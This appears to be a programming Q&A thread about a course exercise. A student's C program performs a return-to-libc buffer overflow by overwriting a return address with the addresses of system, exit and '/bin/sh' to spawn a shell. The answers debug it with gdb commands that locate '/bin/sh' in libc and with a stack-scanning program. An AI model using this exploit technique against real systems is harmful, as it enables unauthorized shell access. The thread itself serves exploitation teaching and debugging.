# return to lib_c buffer overflow exercise issue

Tags: c, bash, buffer-overflow

I'm supposed to come up with a program that exploits the "return to libc buffer overflow".  This is, when executed, it cleanly exits and brings up a SHELL prompt.  The program is executed in a bash terminal.  Below is my C code:

```
#include <stdio.h>
int main(int argc, char*argv[]){
    char buffer[7];

    char buf[42];
    int i = 0;
    while(i < 28)
    {
            buf[i] = 'a';
            i = i + 1;
    }

    *(int *)&buf[28] = 0x4c4ab0;
    *(int *)&buf[32] = 0x4ba520;
    *(int *)&buf[36] = 0xbfffff13;

    strcpy(buffer, buf);

    return 0;
}
```

Using [gdb](http://www.sourceware.org/gdb/), I've been able to determine the following:

- Address for "system": 0x4c4ab0
- Address for "exit": 0x4ba520
- The string "/bin/sh" resides in memory at: 0xbfffff13

I also know, using [gdb](http://www.sourceware.org/gdb/), that inserting 32 "A"'s into my buffer variable will overwrite the return address.  So given that the system call is 4 bytes, I start by filling in my memory "leak" at 28 bytes.  At the 28th byte, I begin my system call, then exit call, and finally add my "/bin/sh" memory location.

When I run the program, however, I get the following:

```
sh: B���: command not found
Segmentation fault (core dumped)
```

I'm really not sure what I'm doing wrong...

[EDIT]: I was able to get the string "/bin/sh" by exporting a environmental variable:

```
export MYSHELL="/bin/sh"
```

Comment: Is your string `"/bin/sh"` terminated with a `\0`?

Comment: Seeing as I used "export" to get it into memory - it's quite possible it is terminated with the \0 character.

Comment: @lightningmanic the address of `/bin/sh` changes before and after `gdb`. Find an occurrence of `/bin/sh` directly in the libc and uses this.

Comment: @ouah The address I got for /bin/sh by running my program through gdb, so the address I saw should be the same as when I run the program by itself.  There is no address randomization on this machine, either.

Comment: @lightningmanic even without stack randomization, the shape of the stack is not the same under or not under `gdb`. The stack address of your `MYSHELL` variable is likely to be different not under `gdb` than the one you have under `gdb`.

Answer (score 61):

You can search in libc for a fixed address of a /bin/sh string. Run you program in gdb then:

```
> (gdb) break main
> 
> (gdb) run   
>
> (gdb) print &system  
> $1 = (<text variable, no debug info>*) 0xf7e68250 <system>
> 
> (gdb) find &system,+9999999,"/bin/sh"  
> 0xf7f86c4c
> warning: Unable to access target memory at 0xf7fd0fd4, halting search. 
> 1 pattern found.
```

Good luck.

Comment: Quick note, depending on your architecture, you may need some dummy data between your system() call and your "/bin/sh" execution

Comment: @TuiPopenoe, could you provide an example or a source for your information? I'd like to try it out.

Answer (score 5):

The problem in your program is the pointer you suppose to point to the `/bin/sh` string is actually not pointing to `/bin/sh`.

You get this address using `gdb`. But even without stack randomization, the stack address of your shell variable is different when the program is run under `gdb` than without `gdb`. `gdb` is putting some debug information into the stack and this will shift your shell variables.

To convince yourself here is a quick and dirty program to find a `/bin/sh` string in the stack:

```
#include <stdio.h>
#include <string.h>

int main(void)
{
    char s[] = "/bin/sh";
    char *p = (char *) 0xbffff000;

    while (memcmp(++p, s, sizeof s));

    printf("%s\n", p);
    printf("%p\n", p);
}
```

First double check that stack randomization is disabled:

> ```
> ouah@maou:~$ sysctl kernel.randomize_va_space
> kernel.randomize_va_space = 0
> ouah@maou:~$
> ```

Ok, no stack randomization.

Let's compile the program and run it outside `gdb`:

> ```
> ouah@maou:~$ gcc -std=c99 tst.c
> ouah@maou:~$ ./a.out
> /bin/sh
> 0xbffff724
> ouah@maou:~$
> ```

Now let's run it under `gdb`:

> ```
> ouah@maou:~$ ./a.out
> /bin/sh
> 0xbffff724
> ouah@maou:~$ gdb a.out -q
> Reading symbols from /home/ouah/a.out...(no debugging symbols found)...done.
> (gdb) r
> Starting program: /home/ouah/a.out
> /bin/sh
> 0xbffff6e4
>
> Program exited normally.
> (gdb) quit
> ouah@maou:~$
> ```

As you can see the address of the `/bin/sh` string is different when the program is run inside or outside `gdb`.

Now what you can do is to use a variant of this program to find the true address of your string or a more elegant approach, get the address of a `/bin/sh` string directly from the libc (as you can guess there are a few occurrences).

Comment: While running the example I receive a segmentation fault... why  ?

Comment: doesnt this just print address of string you defined in main?

Comment: @st4rgut, I think the point he is making is that the stack addresses are different.